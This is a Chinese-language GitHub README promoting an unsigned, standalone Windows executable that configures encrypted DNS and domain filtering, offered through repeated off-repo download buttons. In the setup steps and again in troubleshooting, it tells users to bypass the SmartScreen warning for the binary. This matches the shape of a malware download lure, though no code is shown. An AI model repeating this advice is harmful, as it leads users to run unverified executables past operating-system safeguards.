Emotionnyoredeem/dns-security-configurator

GitHub: Emotionnyoredeem/dns-security-configurator

Windows 上的点击式 DNS 加固工具,可在六十秒内为系统所有网络适配器配置加密解析与域名过滤。

Stars: 0 | Forks: 0

Secure DNS Configurator banner # dns-security-configurator 🔒🛰️ ![Version](https://img.shields.io/badge/version-2026-blue?style=for-the-badge) ![Windows](https://img.shields.io/badge/platform-Windows-0078d4?style=for-the-badge&logo=windows&logoColor=white) ![License](https://img.shields.io/badge/license-MIT-green?style=for-the-badge) *Windows 上的点击式 DNS 加固 —— 加密、过滤,六十秒内即可完成配置。*

Download

## 📖 概述 你拥有的每台设备每天都会安静地问几百次“我该去哪里找这个?”,而且默认情况下,这个问题——也就是你的 DNS 流量——会以明文形式发送到你的 ISP 在设置时分配给你的任何解析器。这不仅是一次隐私泄露、一个审查载体,也是 DNS 劫持的敞开的大门,而这一切都捆绑在一个无人问津的设置中。**dns-security-configurator** 的诞生正是为了让修复这个问题不再需要网络学位、打开十几个浏览器标签页,以及花四十分钟去和 Windows 网络适配器设置界面作斗争。 这是一个独立开发、快速交付的实用工具,适用于 Windows 10 和 11,它将 DNS-over-HTTPS、DNS-over-TLS 和供应商切换变成了几次点击的操作。没有后台服务回传数据,没有遥测,没有臃肿的安装程序——只是一个专注的工具,它可以读取你当前的网络配置,准确地向你展示哪些信息暴露了,并让你使用来自 Cloudflare、Quad9 和 NextDNS 等供应商的加密解析器来锁定它。它是为那些关心安全 DNS 配置,但不想为了搞定这件事而成为一名全职系统管理员的人而构建的。 无论你是一个注重隐私的家庭用户、正在对客户端机器进行标准化的小型 IT 团队,还是一个只想在无需安装一堆浏览器扩展的情况下实现广告和恶意软件域名过滤的高级用户,这款工具都是为了解决你的这些痛点而生的。它有效。它速度极快。它不会给你添乱。 ## 🚀 快速开始

Download

## ⚡ 实际功能 - **加密解析器切换** — 通过供应商选择器,将整个适配器的 DNS 从明文 UDP 一键切换为 DNS-over-HTTPS 或 DNS-over-TLS,而无需修改注册表。 - **实时泄露检测** — 内置探针会检查你的请求是否真正通过了加密路径,还是悄无声息地回退到了你 ISP 的解析器。 - **一键回滚** — 每次更改在应用前都会进行快照,因此恢复到原始网络状态只需点击一个按钮,而不是去赌系统还原。 - **恶意软件与广告域名过滤** — 在解析器层面叠加精选的拦截列表,在你的浏览器甚至尝试建立连接之前,阻止已知的恶意域名。 - **多适配器感知** — 分别检测以太网、Wi-Fi 和 VPN 虚拟适配器,这样你就不会意外地留下未受保护的热点连接。 - **配置预设** — 保存“家庭”、“工作”和“公共 Wi-Fi”配置,并在它们之间切换,无需每次重新输入解析器地址。 - **离线优先设计** — 除了你明确触发的 DNS 测试外,应用程序本身不会进行任何外部调用;你的配置数据永远不会离开你的设备。 - **便携模式** — 作为独立的可执行文件运行,无需安装程序,不会污染注册表,如果将其删除,也不会留下任何残留服务。 ### 🧭 如何开始使用 1. 点击上面的下载按钮——它会带你进入官方着陆页,而不是第三方镜像。 2. 下载独立的 `.exe` 文件,没有安装向导,也没有捆绑工具栏。 3. 运行它。Windows 可能会针对未签名/新发布者的应用程序显示 SmartScreen 提示——点击“更多信息”,然后点击“仍要运行”。 4. 选择一个解析器配置,点击 **Apply**,看着泄露检测器确认你已处于加密保护之下。 ## 🖥️ 系统要求 ![Windows 10](https://img.shields.io/badge/Windows-10-0078d4?style=flat-square&logo=windows) ![Windows 11](https://img.shields.io/badge/Windows-11-0078d4?style=flat-square&logo=windows) ![Deps](https://img.shields.io/badge/dependencies-none-success?style=flat-square) ![Status](https://img.shields.io/badge/status-active-brightgreen?style=flat-square) | 要求 | 详情 | |---|---| | 操作系统 | Windows 10 (64-bit) 或 Windows 11 | | 依赖项 | 无 — 完全独立的可执行文件 | | 磁盘空间 | 25 MB 以下 | | 管理员权限 | 仅在修改适配器 DNS 设置时需要 | | 互联网 | 获取拦截列表和运行泄露测试时需要 | ## 🧩 工作原理 每次你应用配置时,该工具都会在一个简单的线性 pipeline 中运行: 1. **Scan** — 读取你当前活动的网络适配器及其分配的 DNS。 2. **Diagnose** — 标记明文解析器、异常的 DNS 服务器或被劫持的设置。 3. **Configure** — 将选定的加密解析器配置写入选定的适配器。 4. **Verify** — 通过新路径运行实时查询,并确认端到端的加密。 5. **Snapshot** — 存储更改前的状态,以便随时一键回滚。 ``` flowchart LR Scan --> Diagnose Diagnose --> Configure Configure --> Verify Verify --> Snapshot ``` ## 🛟 故障排除
应用配置后,我的浏览器仍然显示旧的 DNS 供应商。 像 Firefox 和 Chrome 这样的浏览器有时会独立于 Windows 缓存它们自己的 DNS-over-HTTPS 设置。请检查浏览器的网络/安全设置,禁用其内置的 DoH,或者将其指向你在系统范围内配置的相同解析器。
泄露测试显示我处于“部分加密”状态。这是什么意思? 这通常意味着某个适配器(通常是 VPN 虚拟适配器)仍在使用明文回退解析器。在应用程序中打开适配器列表,并将配置应用到每个活动的适配器上,而不仅仅是你的主连接。
Windows SmartScreen 拦截了该可执行文件。 对于尚未购买代码签名证书的快速迭代的独立工具来说,这是正常现象。点击“更多信息” → “仍要运行”。该二进制文件与着陆页上发布的完全一致,未作修改。
我可以在开启 VPN 的情况下使用它吗? 可以,但 VPN 通常会通过隧道推送它们自己的 DNS 服务器。使用多适配器视图来确认 VPN 适配器上实际处于活动状态的解析器,并在需要时也将你的加密配置应用在那里。
回滚未能完全恢复我之前的设置。 回滚会恢复应用程序拍摄的最后一个快照。如果你在两次快照之间在工具外部手动更改了 DNS 设置,这些手动更改将不会被捕获。在进行进一步尝试之前,请先拍摄一个新的快照。
## 🎨 UI、快捷键与设置 | 快捷键 | 操作 | |---|---| | `Ctrl + Enter` | 应用当前配置 | | `Ctrl + Z` | 回滚上一次更改 | | `Ctrl + T` | 运行泄露测试 | | `Ctrl + ,` | 打开设置 | | `F5` | 刷新适配器列表 | - **主题** — 深色(默认)、浅色以及针对无障碍访问的高对比度模式。 - **紧凑模式** — 将适配器列表折叠为单行视图,以适应较小的窗口。 - **通知开关** — 在成功切换配置后,静音系统托盘的弹出通知。 - **自动验证** — 每次 Windows 重新连接到网络时,可选择自动重新运行泄露测试。 ## 📜 许可证 基于 [MIT License](LICENSE) 发布,2026 年。你可以随心所欲地使用它——发布它、fork 它,或者将其放入企业的镜像流水线中。只要别移除许可证声明即可。 ## ⚠️ 免责声明 此工具会修改你机器上的网络适配器 DNS 配置。虽然每项更改都已拍摄快照以供回滚,但在应用配置后,你有责任验证网络是否按预期运行,尤其是在受管理或企业设备上。开发者“按原样”提供本软件,不提供任何保证,并且对连接问题、配置错误的环境或第三方解析器宕机不承担任何责任。

Download

标签:DNS配置, DoH, DoT, 后端开发, 网络安全, 网络安全, 隐私保护, 隐私保护